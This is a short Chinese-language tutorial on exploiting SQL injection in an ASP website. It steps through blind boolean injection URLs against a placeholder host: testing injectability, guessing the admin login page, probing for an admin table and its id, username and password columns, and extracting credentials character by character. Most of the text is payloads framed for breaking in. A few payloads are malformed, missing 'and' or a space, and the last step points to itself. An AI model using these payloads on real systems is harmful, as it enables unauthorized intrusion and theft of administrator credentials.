SQL注入利用的几大步骤

　　第一步：

　　http://www.aaa.com/./show.asp?id=259
　　http://www.aaa.com/./show.asp?id=259 and 1=1
　　http://www.aaa.com/./show.asp?id=259 and 1=2
　　简单判断是否可以注入


　　第二步：

　　猜测管理员登陆界面！什么admin.asp、admin_admin.asp之类的，猜不出来的话，快点想别的出路！猜出来了再继续猜：

　　http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20*%20from%20admin)

　　然后猜测登陆账户存在于哪个表中，这里猜的是admin。（假设存在）

　　第三步：

　　接下来是个关键！猜测admin表中有哪些字段，下面三条分别是id、username、password是否存在的猜测（假设都存在）。可以根据上面登陆界面里的变量名来猜字段！

　　http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin)
　　http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20username%20from%20admin)
　　http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20password%20from%20admin)

　　第四步：

　　http://www.aaa.com/./show.asp?id=259%20and%20exists%20(select%20id%20from%20admin%20where%20id=1)

　　猜测admin的ID是多少，注意我用的语法格式，这里假设猜出来ID=1。

　　http://www.aaa.com/./show.asp?id=259and%20exists%20(select%20id%20from%20admin%20where len(username)=6%20and%20id=1)

　　猜测username长度是否为6。

http://www.aaa.com/./show.asp?id=259%20exists%20(select%20id%20from%20admin%20where%20asc(mid(username,1,1))>110%20and%20id=1)

　　然后再猜他的用户名是什么，有的时候不能用mid，所以我一般都是直接用left函数猜，比如：
　　http://www.aaa.com/./show.asp?id=259%20exists%20(select%20id%20from%20admin%20where%20left(username,1)='a')

　　第五步：

　　重复第五步，只不过将username换成password而已。